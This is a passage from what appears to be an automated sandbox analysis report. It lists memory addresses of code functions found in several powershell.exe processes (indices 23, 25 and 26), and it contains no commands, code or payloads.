                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C72CB23_2_00007FF9BB3C72CB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CAACB23_2_00007FF9BB3CAACB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C726D23_2_00007FF9BB3C726D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C628B23_2_00007FF9BB3C628B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B111D23_2_00007FF9BB3B111D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C814D23_2_00007FF9BB3C814D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C594D23_2_00007FF9BB3C594D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C68ED23_2_00007FF9BB3C68ED
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C78FB23_2_00007FF9BB3C78FB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B98FD23_2_00007FF9BB3B98FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C519B23_2_00007FF9BB3C519B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B81CD23_2_00007FF9BB3B81CD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C996D23_2_00007FF9BB3C996D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CC01D23_2_00007FF9BB3CC01D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C47DB23_2_00007FF9BB3C47DB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C9FFD23_2_00007FF9BB3C9FFD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B000A23_2_00007FF9BB3B000A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CB86D23_2_00007FF9BB3CB86D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C708E23_2_00007FF9BB3C708E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B6F3D23_2_00007FF9BB3B6F3D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CDF1023_2_00007FF9BB3CDF10
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CC7AD23_2_00007FF9BB3CC7AD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C6FAB23_2_00007FF9BB3C6FAB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C5FAD23_2_00007FF9BB3C5FAD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C277623_2_00007FF9BB3C2776
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B3F6D23_2_00007FF9BB3B3F6D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CA77D23_2_00007FF9BB3CA77D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CB61D23_2_00007FF9BB3CB61D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B763D23_2_00007FF9BB3B763D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CA5DD23_2_00007FF9BB3CA5DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B2DFD23_2_00007FF9BB3B2DFD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C660B23_2_00007FF9BB3C660B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CA52D23_2_00007FF9BB3CA52D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C6D2D23_2_00007FF9BB3C6D2D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CBD4823_2_00007FF9BB3CBD48
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3BCD3D23_2_00007FF9BB3BCD3D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C559D23_2_00007FF9BB3C559D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B956D23_2_00007FF9BB3B956D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CC58D23_2_00007FF9BB3CC58D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CCD9023_2_00007FF9BB3CCD90
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB546FA523_2_00007FF9BB546FA5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB5314F023_2_00007FF9BB5314F0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB69EC7523_2_00007FF9BB69EC75
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB69B33623_2_00007FF9BB69B336
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB691B2823_2_00007FF9BB691B28
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6A13B023_2_00007FF9BB6A13B0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6A12AF23_2_00007FF9BB6A12AF
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6A11B623_2_00007FF9BB6A11B6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF5135825_2_00007FF9BAF51358
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF663E925_2_00007FF9BAF663E9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF66B1025_2_00007FF9BAF66B10
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF6728825_2_00007FF9BAF67288
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF5B1D525_2_00007FF9BAF5B1D5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C9D3825_2_00007FF9BB1C9D38
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C86E125_2_00007FF9BB1C86E1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB22176025_2_00007FF9BB221760
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB25313625_2_00007FF9BB253136
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB400C1D25_2_00007FF9BB400C1D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FAC4025_2_00007FF9BB3FAC40
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40AC3E25_2_00007FF9BB40AC3E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4133E925_2_00007FF9BB4133E9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB407BDD25_2_00007FF9BB407BDD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB406C9D25_2_00007FF9BB406C9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40BCB825_2_00007FF9BB40BCB8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4104C025_2_00007FF9BB4104C0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FB31D25_2_00007FF9BB3FB31D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40CB4D25_2_00007FF9BB40CB4D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40631425_2_00007FF9BB406314
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB404B0B25_2_00007FF9BB404B0B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40CBAB25_2_00007FF9BB40CBAB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FE35D25_2_00007FF9BB3FE35D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40A24C25_2_00007FF9BB40A24C
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40723B25_2_00007FF9BB40723B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FD24D25_2_00007FF9BB3FD24D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4091FD25_2_00007FF9BB4091FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40C2AD25_2_00007FF9BB40C2AD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB405A9D25_2_00007FF9BB405A9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40BAD525_2_00007FF9BB40BAD5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FFA5D25_2_00007FF9BB3FFA5D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB406A7D25_2_00007FF9BB406A7D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40BA7D25_2_00007FF9BB40BA7D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40A92D25_2_00007FF9BB40A92D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40514B25_2_00007FF9BB40514B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4098DD25_2_00007FF9BB4098DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F119925_2_00007FF9BB3F1199
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4001BD25_2_00007FF9BB4001BD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40B16D25_2_00007FF9BB40B16D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40798425_2_00007FF9BB407984
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40484D25_2_00007FF9BB40484D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40B7DD25_2_00007FF9BB40B7DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F07FD25_2_00007FF9BB3F07FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB406FFE25_2_00007FF9BB406FFE
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FF00D25_2_00007FF9BB3FF00D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F000A25_2_00007FF9BB3F000A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4058BD25_2_00007FF9BB4058BD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4080BD25_2_00007FF9BB4080BD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F186D25_2_00007FF9BB3F186D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40786B25_2_00007FF9BB40786B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB405F1D25_2_00007FF9BB405F1D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB406F1B25_2_00007FF9BB406F1B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40C71D25_2_00007FF9BB40C71D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40A79D25_2_00007FF9BB40A79D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F47C225_2_00007FF9BB3F47C2
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB409F6D25_2_00007FF9BB409F6D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40BF8D25_2_00007FF9BB40BF8D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40161D25_2_00007FF9BB40161D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FD5DD25_2_00007FF9BB3FD5DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FBEAD25_2_00007FF9BB3FBEAD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB404E5B25_2_00007FF9BB404E5B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40DE9025_2_00007FF9BB40DE90
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40552D25_2_00007FF9BB40552D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40A54D25_2_00007FF9BB40A54D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4074FD25_2_00007FF9BB4074FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40C4FD25_2_00007FF9BB40C4FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40CD0025_2_00007FF9BB40CD00
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB402DA625_2_00007FF9BB402DA6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4045BD25_2_00007FF9BB4045BD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40B58D25_2_00007FF9BB40B58D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40657B25_2_00007FF9BB40657B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB5754CD25_2_00007FF9BB5754CD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBA11E4E25_2_00007FF9BBA11E4E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBB8955A25_2_00007FF9BBB8955A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBB81BEA25_2_00007FF9BBB81BEA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBB801C825_2_00007FF9BBB801C8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBB8956325_2_00007FF9BBB89563
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBB8656F25_2_00007FF9BBB8656F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F983125_2_00007FF9BB3F9831
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4121826_2_00007FF9BAF41218
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4324A26_2_00007FF9BAF4324A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4D27826_2_00007FF9BAF4D278
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF627E026_2_00007FF9BAF627E0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF40FE026_2_00007FF9BAF40FE0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF6601826_2_00007FF9BAF66018
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF41F1826_2_00007FF9BAF41F18
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4EF5026_2_00007FF9BAF4EF50
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4663826_2_00007FF9BAF46638
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF456AA26_2_00007FF9BAF456AA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF48BAD26_2_00007FF9BAF48BAD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF5829226_2_00007FF9BAF58292
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4190526_2_00007FF9BAF41905
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4103026_2_00007FF9BAF41030
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF418D626_2_00007FF9BAF418D6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF41F7026_2_00007FF9BAF41F70
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF5868826_2_00007FF9BAF58688
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB1A41C126_2_00007FF9BB1A41C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB1A47C826_2_00007FF9BB1A47C8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB35561D26_2_00007FF9BB35561D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CDC1A26_2_00007FF9BB3CDC1A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E642D26_2_00007FF9BB3E642D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F042D26_2_00007FF9BB3F042D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D63FF26_2_00007FF9BB3D63FF
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E7BFA26_2_00007FF9BB3E7BFA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D540C26_2_00007FF9BB3D540C
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D44A526_2_00007FF9BB3D44A5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CBC9E26_2_00007FF9BB3CBC9E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EFC9D26_2_00007FF9BB3EFC9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C8CA926_2_00007FF9BB3C8CA9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CECD326_2_00007FF9BB3CECD3
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DD47226_2_00007FF9BB3DD472
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E548726_2_00007FF9BB3E5487
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C748726_2_00007FF9BB3C7487
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C1C7B26_2_00007FF9BB3C1C7B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C5B2826_2_00007FF9BB3C5B28
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C4B1B26_2_00007FF9BB3C4B1B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F2B1D26_2_00007FF9BB3F2B1D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C631E26_2_00007FF9BB3C631E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F4B4126_2_00007FF9BB3F4B41
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D734E26_2_00007FF9BB3D734E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F32DD26_2_00007FF9BB3F32DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E7ADB26_2_00007FF9BB3E7ADB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CD2F626_2_00007FF9BB3CD2F6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E12F026_2_00007FF9BB3E12F0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E5B0226_2_00007FF9BB3E5B02
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DDAFA26_2_00007FF9BB3DDAFA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F239D26_2_00007FF9BB3F239D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EDBC126_2_00007FF9BB3EDBC1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D5BD526_2_00007FF9BB3D5BD5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D836126_2_00007FF9BB3D8361
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DCB7526_2_00007FF9BB3DCB75
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CAB6926_2_00007FF9BB3CAB69
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E536B26_2_00007FF9BB3E536B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C838426_2_00007FF9BB3C8384
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EAB7D26_2_00007FF9BB3EAB7D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E6B9526_2_00007FF9BB3E6B95
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C122726_2_00007FF9BB3C1227
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EFA1D26_2_00007FF9BB3EFA1D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F021D26_2_00007FF9BB3F021D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F09DD26_2_00007FF9BB3F09DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F11DD26_2_00007FF9BB3F11DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C41D926_2_00007FF9BB3C41D9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CA1EC26_2_00007FF9BB3CA1EC
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CDA0626_2_00007FF9BB3CDA06
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D521726_2_00007FF9BB3D5217
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DE2A526_2_00007FF9BB3DE2A5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EE2A826_2_00007FF9BB3EE2A8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CF2A326_2_00007FF9BB3CF2A3
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EEA9D26_2_00007FF9BB3EEA9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EF29D26_2_00007FF9BB3EF29D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F1A9D26_2_00007FF9BB3F1A9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DB2D526_2_00007FF9BB3DB2D5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C7AD626_2_00007FF9BB3C7AD6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C2A6126_2_00007FF9BB3C2A61
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CCA6326_2_00007FF9BB3CCA63
